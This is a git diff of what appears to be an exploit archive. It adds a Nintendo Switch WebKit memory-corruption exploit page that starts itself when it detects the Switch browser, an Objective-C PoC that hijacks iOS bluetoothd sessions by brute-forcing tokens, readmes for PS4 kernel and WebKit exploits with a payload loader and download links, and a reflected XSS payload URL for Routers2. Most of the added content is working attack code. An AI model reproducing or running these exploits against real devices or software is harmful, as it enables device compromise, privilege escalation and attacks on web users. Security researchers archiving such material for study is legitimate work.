+                        p7: { value: 7 },
+                        p8: { value: 8 },
+                        // the length of this object is set to this object that does evil stuff with toString()
+                        length: { value: not_number },
+                        // the reference to the arr array. Which will later be freed.
+                        stale: { value: arr },
+                        after: { value: 666 }
+                    };
+                    // define a new target array
+                    var target = [];
+
+                    // TRIGGER BUG!
+                    // set the properties of the target based on the previously defined ones
+                    Object.defineProperties(target, props);
+
+                    // get a reference to the target stale property, which points to arr
+                    stale = target.stale;
+
+                    // make sure that the stale[0] points actually to the 0x41414141 data if not, we don\'t wanna mess with it and try again
+                    if(stale[0]==0x41414141) {
+                        // stale[0] is now pointing at a fake Integer 0x41414141. Now make it 0x41414242
+                        stale[0] += 0x101;
+                        //stale[0] = 0x41414242;
+                        //document.getElementById(\'status\').innerText = \'bug done.\';
+                        // searching the whole memory that is overlaying the old arr. Looking for 0x41414242
+                        for (i = 0; i < bufs.length; i++) {
+                            for (k = 0; k < bufs[0].length; k++) {
+                                // Found the value! bufs[i][k] point now at the same memory as stale[0]
+                                if (bufs[i][k] == 0x41414242) {
+                                    alert(\'Overlapping Arrays found at bufs[\'+i+\'][\'+k+\']\\nsmash.length is still: 0x\'+smash.length.toString(16));
+
+                                    // create a new object. Will look kinda like this:
+                                    // 0x0100150000000136 0x0000000000000000 <- fictional value
+                                    // 0x0000000000000064 0x0000000000000000 <- [\'a\'],[\'b\']
+                                    // 0x???????????????? 0x0000000000000100 <- [\'c\'],[\'d\']
+                                    stale[0] = {
+                                        \'a\': u2d(105, 0), // the JSObject properties ; 105 is the Structure ID of Uint32Array
+                                        \'b\': u2d(0, 0),
+                                        \'c\': smash, // var pointing at the struct of a Uint32Array(0x10)
+                                        \'d\': u2d(0x100, 0)
+                                    }
+
+                                    alert(\'created the JSObject.\\nstale[0] = \'+stale[0]);
+
+                                    // remember the original stale pointer, pointing at the object with the a,b,c,d properties
+                                    stale[1] = stale[0];
+
+                                    // now add 0x10 to the pointer of stale[0], which points now in the middle of the object.
+                                    bufs[i][k] += 0x10;
+                                    // check the type of stale[0].
+
+                                    // removed the loop because it makes the exploit sooooooo unreliable
+                                    // based on phrack paper - Predicting structure IDs (http://www.phrack.org/papers/attacking_javascript_engines.html)
+                                    /*while(!(stale[0] instanceof Uint32Array)) {
+                                        // if stale[0] is not a Uint32Array yet, increment the structureID guess
+                                        structureID++;
+
+                                        // assign the next structureID to the original object still referenced by stale[1]
+                                        stale[1][\'a\'] = u2d(structureID, 0);
+                                    }*/
+
+                                    // Give some information. stale[0] should now be a Uint32Array
+                                    alert(\'misaligned the pointer to the JSObject.\\nstale[0] = \'+stale[0]+\'\');
+
+                                    // write to the 6th 32bit value of the memory pointed to by the crafted Uint32Array
+                                    // which should point to the struct of smash, allowing us to overwrite the length of smash
+                                    stale[0][6] = 0x1337;
+
+                                    // check the length of smash is now.
+                                    alert(\'smash.length is now: 0x\'+smash.length.toString(16));
+
+                                    alert(\'done!\\nswitch will probably crash now :O\');
+                                    return;
+                                }
+                            }
+                        }
+                    }
+                    document.getElementById(\'status\').innerText = \' fail. refresh the page and try again...\';
+                    setTimeout(function() {document.location.reload();}, 1000);
+                }
+
+                function go() {
+                    document.getElementById(\'status\').innerText = \' go! \';
+                    dgc();
+                    dgc();
+                    dgc();
+                    dgc();
+                    dgc();
+                    dgc();
+                    setTimeout(go_, 500);
+                }
+
+                // if Switch browser is detected, auto start exploit
+                if(navigator.userAgent.indexOf(\'Nintendo Switch\')>-1) {
+                    document.getElementById(\'status\').innerText = \'Found Nintendo Switch! \';
+                    setTimeout(go, 2000);
+                }
+            </script>
+    </body>
+</html>
\ No newline at end of file
diff --git a/exploits/hardware/remote/44196.md b/exploits/hardware/remote/44196.md
new file mode 100644
index 000000000..5070416a6
--- /dev/null
+++ b/exploits/hardware/remote/44196.md
@@ -0,0 +1,26 @@
+# PS4 4.55 Kernel Exploit
+---
+## Summary
+In this project you will find a full implementation of the "bpf" kernel exploit for the PlayStation 4 on 4.55. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This release however, *does not* contain any code related to defeating anti-piracy mechanisms or running homebrew. This exploit does include a loader that listens for payloads on port `9020` and will execute them upon receival.
+
+This bug was discovered by qwertyoruiopz, and can be found hosted on his website [here](http://crack.bargains/455/).
+
+## Patches Included
+The following patches are made by default in the kernel ROP chain:
+1) Disable kernel write protection
+2) Allow RWX (read-write-execute) memory mapping
+3) Syscall instruction allowed anywhere
+4) Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode
+5) Allow unprivileged users to call `setuid(0)` successfully. Works as a status check, doubles as a privilege escalation.
+
+## Notes
+- Early stages, so no payloads yet, I may provide a debug menu payload later on in the day.
+
+## Contributors
+Massive credits to the following:
+
+- [qwertyoruiopz](https://twitter.com/qwertyoruiopz)
+- [Flatz](https://twitter.com/flat_z)
+- Anonymous
+
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44196.zip
\ No newline at end of file
diff --git a/exploits/hardware/remote/4522.html b/exploits/ios/remote/4522.html
similarity index 100%
rename from exploits/hardware/remote/4522.html
rename to exploits/ios/remote/4522.html
diff --git a/exploits/linux/local/44204.md b/exploits/linux/local/44204.md
new file mode 100644
index 000000000..f320bdbb2
--- /dev/null
+++ b/exploits/linux/local/44204.md
@@ -0,0 +1,44 @@
+# CVE-2014-1303 PoC for Linux
+CVE-2014-1303 (WebKit Heap based BOF) proof of concept for Linux.  
+This repository demonstrates the WebKit heap based buffer overflow vulnerability (CVE-2014-1303) on **Linux**.  
+
+**NOTE:** Original exploit is written for Mac OS X and PS4 (PlayStation4).  
+
+I've ported and tested work on Ubuntu 14.04, [WebKitGTK 2.1.2](https://webkitgtk.org/releases/)  
+
+## Usage
+Firstly you need to run simple web server,  
+```
+$ python server.py
+```  
+then  
+```
+$ cd /path/to/webkitgtk2.1.2/
+$ ./Programs/GtkLauncher http://localhost
+```
+You can run several tests like,  
+- Crash ROP (Jump to invalid address like 0xdeadbeefdeadbeef)
+- Get PID (Get current PID)
+- Code Execution (Load and execute payload from outer network)  
+- File System Dump (Dump "/dev" entries)  
+
+## Description
+**exploit.html**           .....  trigger vulnerability and jump to ROP chain  
+**scripts/roputil.js**     .....  utilities for ROP building  
+**scripts/syscall.js**     .....  syscall ROP chains  
+**scripts/code.js**        .....  hard coded remote loader  
+**loader/**                .....  simple remote loader (written in C)  
+**loader/bin2js**          .....  convert binary to js variables (for loader)  
+
+## Purpose
+I've created this WebKit PoC for education in my course.    
+I couldn't, of course, use actual PS4 console in my lecture for legal reason :(  
+
+## Reference
+CVE 2014-1303 Proof Of Concept for PS4  
+(https://github.com/Fire30/PS4-2014-1303-POC)  
+Liang Chen, WEBKIT EVERYWHERE: SECURE OR NOT? [BHEU14]   
+(https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF)
+
+
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44204.zip
\ No newline at end of file
diff --git a/exploits/linux/local/44205.md b/exploits/linux/local/44205.md
new file mode 100644
index 000000000..d62870892
--- /dev/null
+++ b/exploits/linux/local/44205.md
@@ -0,0 +1,16 @@
+# CVE-2014-9322 PoC for Linux kernel
+CVE-2014-9322 (a.k.a BadIRET) proof of concept for Linux kernel.  
+This PoC uses only syscalls not any libraries, like pthread. Threads are implemented using raw Linux syscalls.  
+[Raw Linux Threads via System Calls](http://nullprogram.com/blog/2015/05/15/)  
+
+# Usage
+```
+$ make
+```
+**badiret.elf** is an ELF executable.  
+**badiret.bin** is a raw binary that can be used as payload.  
+
+# Reference
+[Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation)](https://blogs.bromium.com/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/)  
+
+Download: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44205.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/44215.m b/exploits/multiple/dos/44215.m
new file mode 100644
index 000000000..d83e27333
--- /dev/null
+++ b/exploits/multiple/dos/44215.m
@@ -0,0 +1,222 @@
+//
+//  main.m
+//  bluetoothdPoC
+//
+//  Created by Rani Idan.
+//  Copyright © 2018 zLabs. All rights reserved.
+//
+
+
+#import "AppDelegate.h"
+
+#include <mach/mach.h>
+
+extern kern_return_t bootstrap_look_up(mach_port_t bs, const char *service_name, mach_port_t *service);
+
+/* When hijacking session between bluetoothd and client, add callback to the client and jump to CALLBACK_ADDRESS with CALLBACK_ADDITIONAL_DATA */
+#define CALLBACK_ADDRESS 0xdeadbeef
+#define CALLBACK_ADDITIONAL_DATA 0x13371337
+
+#define BLUETOOTHD_CONST 0xFA300
+#define BLUETOOTHD_WRONG_TOKEN 7
+
+#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_RECV_SIZE 0x44
+#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_SEND_SIZE 0x48
+#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_OPTIONS 0x113
+#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_MSG_ID 3
+#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_TIMEOUT 0x1000
+#define BLUETOOTHD_MIG_SERVER_NAME "com.apple.server.bluetooth"
+
+#define ADD_CALLBACK_MACH_MSG_OUT_RETURN_VALUE_OFFSET 0x20
+#define ADD_CALLBACK_MACH_MSG_IN_SESSION_TOKEN_OFFSET 0x20
+#define ADD_CALLBACK_MACH_MSG_IN_CALLBACK_ADDRESS_OFFSET 0x28
+#define ADD_CALLBACK_MACH_MSG_IN_CALLBACK_DATA 0x40
+
+
+
+typedef unsigned int mach_msg_return_value;
+
+
+mach_port_t get_service_port(char *service_name)
+{
+    
+    kern_return_t ret = KERN_SUCCESS;
+    mach_port_t service_port = MACH_PORT_NULL;
+    mach_port_t bs = MACH_PORT_NULL;
+    
+    
+    ret = task_get_bootstrap_port(mach_task_self(), &bs);
+    
+    ret = bootstrap_look_up(bootstrap_port, service_name, &service_port);
+    if (ret)
+    {
+        NSLog(@"Couldn't find port for %s",service_name);
+        return MACH_PORT_NULL;
+    }
+    
+    NSLog(@"Got port: %x", service_port);
+    
+    mach_port_deallocate(mach_task_self(), bs);
+    return service_port;
+}
+
+
+mach_msg_return_value BTLocalDevice_add_callback(mach_port_t bluetoothd_port, mach_port_t session_token, void* callback_address, long additional_data)
+{
+    mach_port_t receive_port = MACH_PORT_NULL;
+    mach_msg_header_t * message = NULL;
+    char *data = NULL;
+    kern_return_t ret = KERN_SUCCESS;
+    
+    mach_msg_return_value return_value = 0;
+    
+    
+    
+    mach_msg_id_t msgh_id = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_MSG_ID;
+    mach_msg_size_t recv_size = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_RECV_SIZE;
+    mach_msg_size_t send_size = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_SEND_SIZE;
+    mach_msg_option_t options = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_OPTIONS;
+    mach_msg_size_t msg_size = MAX(recv_size, send_size);
+    
+    
+    ret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &receive_port);
+    if ( ret != KERN_SUCCESS)
+    {
+        return_value = -3;
+        NSLog(@"Failed to allocate port ret=%x", ret);
+        NSLog(@"mach_error_string: mach_error_string %s", mach_error_string(ret));
+        goto cleanup;
+    }
+    ret = mach_port_insert_right(mach_task_self(), receive_port, receive_port, MACH_MSG_TYPE_MAKE_SEND);
+    if ( ret != KERN_SUCCESS)
+    {
+        return_value = -3;
+        NSLog(@"Failed to insert port right ret=%x", ret);
+        NSLog(@"mach_error_string: mach_error_string %s", mach_error_string(ret));
+        goto cleanup;
+    }
+    message = malloc(msg_size);
+    data = (char *)message;
+    
+    memset(message, 0, msg_size);
+    
+    *((mach_port_t *)(data+ADD_CALLBACK_MACH_MSG_IN_SESSION_TOKEN_OFFSET)) = session_token;
+    *((void **)(data+ADD_CALLBACK_MACH_MSG_IN_CALLBACK_ADDRESS_OFFSET)) = callback_address;
+    *((long *)(data+ADD_CALLBACK_MACH_MSG_IN_CALLBACK_DATA)) = additional_data;
+    
+    message->msgh_bits = 0x1513 ;
+    
+    message->msgh_remote_port = bluetoothd_port; /* Request port */
+    message->msgh_local_port = receive_port; /* Reply port */
+    message->msgh_size =  send_size;    /* Message size */
+    message->msgh_reserved = 0;
+    
+    
+    message->msgh_id = BLUETOOTHD_CONST + msgh_id;
+    
+    ret = mach_msg(message,              /* The header */
+                   options, /* Flags */
+                   send_size,              /* Send size */
+                   recv_size,              /* Max receive Size */
+                   receive_port,                 /* Receive port */
+                   BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_TIMEOUT,        /* No timeout */
+                   MACH_PORT_NULL);              /* No notification */
+    
+    
+    if(MACH_MSG_SUCCESS == ret)
+    {
+        return_value = *(mach_msg_return_value *) (((char *) message) + ADD_CALLBACK_MACH_MSG_OUT_RETURN_VALUE_OFFSET);
+        if (return_value != BLUETOOTHD_WRONG_TOKEN) {
+            NSLog(@"Sent message id %d with token %x, returned: %x", msgh_id, session_token, return_value);
+        }
+    } else if (MACH_RCV_INVALID_NAME == ret)
+    {
+        NSLog(@"mach_error_string: mach_error_string %s", mach_error_string(ret));
+        NSLog(@"mach_error_int: ret=%x", ret);
+        NSLog(@"mach_remote_port: %x", message->msgh_remote_port);
+        return_value = -2;
+    }
+    else {
+        NSLog(@"mach_error_string: mach_error_string %s", mach_error_string(ret));
+        NSLog(@"mach_error_int: ret=%x", ret);
+        NSLog(@"mach_remote_port: %x", message->msgh_remote_port);
+        return_value = -1;
+    }
+    
+    
+cleanup:
+    if(MACH_PORT_NULL != receive_port)
+    {
+        mach_port_destroy(mach_task_self(), receive_port);
+    }
+    if (NULL != message) {
+        free(message);
+    }
+    return return_value;
+}
+
+
+
+void try_to_add_callback_BTLocalDeviceAddCallbacks(void * address, long value)
+{
+    int ports_found[0xffff] = {0};
+    int number_of_ports_found = 0;
+    
+    mach_port_t bluetoothd_port = get_service_port(BLUETOOTHD_MIG_SERVER_NAME);
+    if (MACH_PORT_NULL == bluetoothd_port)
+    {
+        NSLog(@"Couldn't have bluetoothd port");
+        return;
+    }
+    
+    NSLog(@"Starting to look for session tokens");
+    for (int i = 0; i <= 0xffff; i++) {
+        int id = 0;
+        id = (i << 16) + 1;
+        int result_code = BTLocalDevice_add_callback(bluetoothd_port, id, NULL, 0);
+        if(result_code != BLUETOOTHD_WRONG_TOKEN && result_code != -1)
+        {
+            NSLog(@"Found port: %x", id);
+            ports_found[number_of_ports_found] = id;
+            number_of_ports_found ++;
+        }
+        
+        
+        id = (i << 16) + 2;
+        result_code = BTLocalDevice_add_callback(bluetoothd_port, id, NULL, 0);
+        if(result_code != BLUETOOTHD_WRONG_TOKEN && result_code != -1)
+        {
+            NSLog(@"Found port: %x", id);
+            ports_found[number_of_ports_found] = id;
+            number_of_ports_found ++;
+        }
+        
+        
+        id = (i << 16);
+        result_code = BTLocalDevice_add_callback(bluetoothd_port, id, NULL, 0);
+        if(result_code != BLUETOOTHD_WRONG_TOKEN && result_code != -1)
+        {
+            NSLog(@"Found port: %x", id);
+            ports_found[number_of_ports_found] = id;
+            number_of_ports_found ++;
+        }
+        
+    }
+    
+    for (int i = number_of_ports_found-1; i>=0; i--) {
+        NSLog(@"Adding callback: Port=%x address=%x value=%x", ports_found[i], (unsigned int)address, (unsigned int)value);
+        BTLocalDevice_add_callback(bluetoothd_port, ports_found[i],address, value);
+    }
+    
+    NSLog(@"Done");
+    return;
+}
+
+void trigger() {
+    try_to_add_callback_BTLocalDeviceAddCallbacks((void *)CALLBACK_ADDRESS, CALLBACK_ADDITIONAL_DATA);
+}
+
+
+int main(int argc, char * argv[]) {
+    trigger();
+}
\ No newline at end of file
diff --git a/exploits/perl/webapps/44216.txt b/exploits/perl/webapps/44216.txt
new file mode 100644
index 000000000..e97e6ddda
--- /dev/null
+++ b/exploits/perl/webapps/44216.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Routers2 2.24 - Reflected Cross-Site Scripting
+# Date: 18-01-18
+# Vendor Homepage: http://www.steveshipway.org/software/
+# Software Link: https://github.com/sshipway/routers2
+# Version: 2.24
+# CVE: CVE-2018-6193
+# Platform: Perl
+# Category: webapps
+# Exploit Author: Lorenzo Di Fuccia
+# Contact: lorenzo.difuccia@gmail.com
+# Website: https://github.com/lorenzodifuccia
+
+1. Description
+
+Routers2 is vulnerable to Reflected Cross-Site Scripting, affecting the 'rtr' GET parameter in a page=graph action to `cgi-bin/routers2.pl`.
+
+2. Proof of Concept
+
+http://router.com/cgi-bin/routers2.pl?rtr=--><script>alert("XSS")</script>&bars=Cami&xgtype=d&page=graph&xgstyle=l2&xmtype=routers
+
+3. Solution
+
+Update the program cloning the repo from GitHub or disable the 'paranoia' setting in the web section of the `routers2.conf`.
+
+4. References
+
+https://github.com/sshipway/routers2/issues/1
\ No newline at end of file
diff --git a/exploits/hardware/local/14727.py b/exploits/windows/local/14727.py
similarity index 100%
rename from exploits/hardware/local/14727.py
rename to exploits/windows/local/14727.py
diff --git a/files_exploits.csv b/files_exploits.csv
index 62e542e7d..0f00d84e9 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5878,6 +5878,10 @@ id,file,description,date,author,type,platform,port
 44183,exploits/linux/dos/44183.py,"Asterisk chan_pjsip 15.2.0 - 'SDP fmtp' Denial of Service",2018-02-27,EnableSecurity,dos,linux,5060
 44184,exploits/linux/dos/44184.py,"Asterisk chan_pjsip 15.2.0 - 'SUBSCRIBE' Stack Corruption",2018-02-27,EnableSecurity,dos,linux,5060
 44189,exploits/windows/dos/44189.py,"Microsoft Windows Windows 8.1/2012 R2 - SMB Denial of Service",2018-02-27,"Nabeel Ahmed",dos,windows,
+44197,exploits/hardware/dos/44197.md,"Sony Playstation 4 (PS4) 5.01 < 5.05 - WebKit Code Execution (PoC)",2018-02-27,ALEXZZZ9,dos,hardware,
+44211,exploits/freebsd_x86-64/dos/44211.c,"FreeBSD Kernel (FreeBSD 10.2 < 10.3 x64) - 'SETFKEY' (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,
+44212,exploits/freebsd_x86-64/dos/44212.c,"FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,
+44215,exploits/multiple/dos/44215.m,"Apple iOS 11.2.5 / watchOS 4.2.2 / tvOS 11.2.5 - 'bluetoothd' Memory Corruption",2018-02-28,"Zimperium zLabs Team",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -7032,7 +7036,7 @@ id,file,description,date,author,type,platform,port
 14503,exploits/windows/local/14503.pl,"HTML Email Creator 2.42 build 718 - Local Buffer Overflow (SEH)",2010-07-29,Madjix,local,windows,
 14527,exploits/windows/local/14527.pl,"WM Downloader 3.1.2.2 - Local Buffer Overflow (1)",2010-08-02,s-dz,local,windows,
 14532,exploits/windows/local/14532.py,"Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Converter - Local Stack Buffer Overflow",2010-08-02,"Praveen Darshanam",local,windows,
-14538,exploits/ios/local/14538.txt,"Apple iOS - '.pdf' Jailbreak",2010-08-03,jailbreakme,local,ios,
+14538,exploits/ios/local/14538.txt,"Apple iOS - '.pdf' Local Privilege Escalation / Jailbreak",2010-08-03,jailbreakme,local,ios,
 14550,exploits/windows/local/14550.py,"Easy RM to MP3 2.7.3.700 - '.m3u' / '.pls' / '.smi' / '.wpl' / '.wax' / '.wvx' / '.ram' Local Overflow",2010-08-04,"Oh Yaw Theng",local,windows,
 14566,exploits/windows/local/14566.c,"Microsoft Windows - 'win32k.sys' Driver 'CreateDIBPalette()' Local Buffer Overflow",2010-08-06,Arkon,local,windows,
 14576,exploits/windows/local/14576.c,"Mini-stream Ripper 3.1.2.1 - Local Buffer Overflow (DEP Bypass)",2010-08-07,"fl0 fl0w",local,windows,
@@ -7054,7 +7058,7 @@ id,file,description,date,author,type,platform,port
 14720,exploits/windows/local/14720.rb,"MicroP 0.1.1.1600 - 'mppl' Local Buffer Overflow",2010-08-23,"James Fitts",local,windows,
 14721,exploits/windows/local/14721.c,"Wireshark 1.2.10 - 'airpcap.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
 14723,exploits/windows/local/14723.c,"Microsoft PowerPoint 2010 - 'pptimpconv.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
-14727,exploits/hardware/local/14727.py,"Foxit Reader 4.0 - '.pdf' Jailbreak",2010-08-24,"Jose Miguel Esparza",local,hardware,
+14727,exploits/windows/local/14727.py,"Foxit Reader 4.0 - '.pdf' Multiple Stack Based Buffer Overflow / Jailbreak",2010-08-24,"Jose Miguel Esparza",local,windows,
 14726,exploits/windows/local/14726.c,"uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
 14728,exploits/windows/local/14728.c,"Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Nicolas Krassas",local,windows,
 14730,exploits/windows/local/14730.c,"Mozilla Firefox 3.6.8 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous",local,windows,
@@ -8489,7 +8493,7 @@ id,file,description,date,author,type,platform,port
 25703,exploits/solaris/local/25703.txt,"Active News Manager - 'login.asp' SQL Injection",2005-05-25,Romty,local,solaris,
 25707,exploits/linux/local/25707.txt,"Linux Kernel 2.6.x - Cryptoloop Information Disclosure",2005-05-26,"Markku-Juhani O. Saarinen",local,linux,
 25709,exploits/linux/local/25709.sh,"Gentoo Webapp-Config 1.10 - Insecure File Creation",2005-05-26,"Eric Romang",local,linux,
-25718,exploits/hardware/local/25718.txt,"Sony Playstation 3 (PS3) 4.31 - Save Game Preview '.SFO' File Handling Local Command Execution",2013-05-26,Vulnerability-Lab,local,hardware,
+25718,exploits/hardware/local/25718.txt,"Sony Playstation 3 (PS3) 4.31 - Save Game Preview '.SFO' Handling Local Command Execution",2013-05-26,Vulnerability-Lab,local,hardware,
 25725,exploits/windows/local/25725.rb,"AdobeCollabSync - Local Buffer Overflow / Adobe Reader X Sandbox Bypass (Metasploit)",2013-05-26,Metasploit,local,windows,
 40392,exploits/linux/local/40392.py,"EKG Gadu 1.9~pre+r2855-3+b1 - Local Buffer Overflow",2016-09-19,"Juan Sacco",local,linux,
 25789,exploits/linux/local/25789.c,"FUSE 2.2/2.3 - Local Information Disclosure",2005-06-06,"Miklos Szeredi",local,linux,
@@ -9330,7 +9334,7 @@ id,file,description,date,author,type,platform,port
 43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux,
 43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change",2017-12-04,gellin,local,windows,
 43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows,
-43397,exploits/bsd/local/43397.md,"Sony Playstation 4 4.05 FW - Local Kernel Loader",2017-12-27,Specter,local,bsd,
+43397,exploits/hardware/local/43397.md,"Sony Playstation 4 (PS4) 4.05 - Jailbreak (WebKit / 'namedobj ' Kernel Loader)",2017-12-27,Specter,local,hardware,
 43418,exploits/linux/local/43418.c,"Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)",2017-08-13,"Andrey Konovalov",local,linux,
 43421,exploits/windows/local/43421.py,"Kingsoft Antivirus/Internet Security 9+ - Local Privilege Escalation",2018-01-03,mr_me,local,windows,
 43427,exploits/multiple/local/43427.c,"Multiple CPUs - 'Spectre' Information Disclosure",2018-01-03,Multiple,local,multiple,
@@ -9543,7 +9547,14 @@ id,file,description,date,author,type,platform,port
 44167,exploits/windows_x86/local/44167.c,"NoMachine < 6.0.80 (x86) - 'nxfuse' Privilege Escalation",2018-02-22,"Fidus InfoSecurity",local,windows_x86,
 44168,exploits/windows_x86-64/local/44168.py,"NoMachine < 6.0.80 (x64) - 'nxfuse' Privilege Escalation",2018-02-22,"Fidus InfoSecurity",local,windows_x86-64,
 44169,exploits/windows/local/44169.txt,"Armadito Antivirus 0.12.7.2 - Detection Bypass",2018-02-22,"Souhail Hammou",local,windows,
-44177,exploits/bsd/local/44177.c,"Sony Playstation 4 4.55 FW - Local Kernel",2018-02-26,qwertyoruiop,local,bsd,
+44177,exploits/hardware/local/44177.c,"Sony Playstation 4 (PS4) 4.07 < 4.55 - 'bpf' Local Kernel Code Execution (PoC)",2018-02-26,qwertyoruiop,local,hardware,
+44198,exploits/hardware/local/44198.md,"Sony Playstation 4 (PS4) 3.50 < 4.07 - WebKit Code Execution (PoC)",2017-04-08,Specter,local,hardware,
+44199,exploits/hardware/local/44199.md,"Sony Playstation 4 (PS4) 3.15 < 3.55 - WebKit Code Execution (PoC)",2016-09-06,"TJ Corley",local,hardware,
+44200,exploits/hardware/local/44200.md,"Sony Playstation 3 (PS3) < 2.50 - WebKit Code Execution (PoC)",2016-04-21,"TJ Corley",local,hardware,
+44204,exploits/linux/local/44204.md,"WebKitGTK 2.1.2  (Ubuntu 14.04) - Heap based Buffer Overflow",2017-08-19,"Ren Kimura",local,linux,
+44205,exploits/linux/local/44205.md,"Linux Kernel - 'BadIRET' Local Privilege Escalation",2017-07-24,"Ren Kimura",local,linux,
+44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader",2016-04-27,"Carlos Pizarro",local,hardware,
+44213,exploits/hardware/local/44213.html,"Nintendo Switch - WebKit Code Execution (PoC)",2017-03-12,LiveOverflow,local,hardware,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -10355,7 +10366,7 @@ id,file,description,date,author,type,platform,port
 4488,exploits/windows/remote/4488.html,"Pegasus Imaging ImagXpress 8.0 - Arbitrary File Overwrite",2007-10-05,shinnai,remote,windows,
 4506,exploits/windows/remote/4506.html,"Microsoft Visual FoxPro 6.0 - 'FPOLE.OCX' Arbitrary Command Execution",2007-10-09,shinnai,remote,windows,
 4514,exploits/linux/remote/4514.c,"Eggdrop Server Module Message Handling - Remote Buffer Overflow",2007-10-10,bangus/magnum,remote,linux,
-4522,exploits/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' File Remote Jailbreak",2007-10-11,"Niacin & Dre",remote,hardware,
+4522,exploits/ios/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' Remote Privilege Escalation / Jailbreak",2007-10-11,"Niacin & Dre",remote,ios,
 4526,exploits/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method",2007-10-12,Katatafish,remote,windows,
 4530,exploits/multiple/remote/4530.pl,"Apache Tomcat - 'WebDAV' Remote File Disclosure",2007-10-14,eliteboy,remote,multiple,
 4533,exploits/linux/remote/4533.c,"eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow",2007-10-15,mu-b,remote,linux,4501
@@ -16265,6 +16276,7 @@ id,file,description,date,author,type,platform,port
 44175,exploits/windows/remote/44175.rb,"CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)",2018-02-26,Metasploit,remote,windows,8888
 44176,exploits/hardware/remote/44176.rb,"AsusWRT LAN - Unauthenticated Remote Code Execution (Metasploit)",2018-02-26,Metasploit,remote,hardware,9999
 44187,exploits/windows/remote/44187.py,"GetGo Download Manager 5.3.0.2712 - Buffer Overflow (SEH)",2018-02-27,bzyo,remote,windows,
+44196,exploits/hardware/remote/44196.md,"Sony Playstation 4 (PS4) 4.55 - Jailbreak (WebKit 5.01 / 'bpf' Kernel Loader 4.55)",2018-02-27,Specter,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -38121,7 +38133,7 @@ id,file,description,date,author,type,platform,port
 44071,exploits/windows/webapps/44071.md,"IDERA Uptime Monitor 7.8 - Multiple Vulnerabilities",2017-06-08,SecuriTeam,webapps,windows,
 44072,exploits/hardware/webapps/44072.md,"Geneko Routers - Unauthenticated Path Traversal",2017-07-16,SecuriTeam,webapps,hardware,
 44074,exploits/hardware/webapps/44074.md,"Dasan Networks GPON ONT WiFi Router H640X 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution",2017-12-06,SecuriTeam,webapps,hardware,
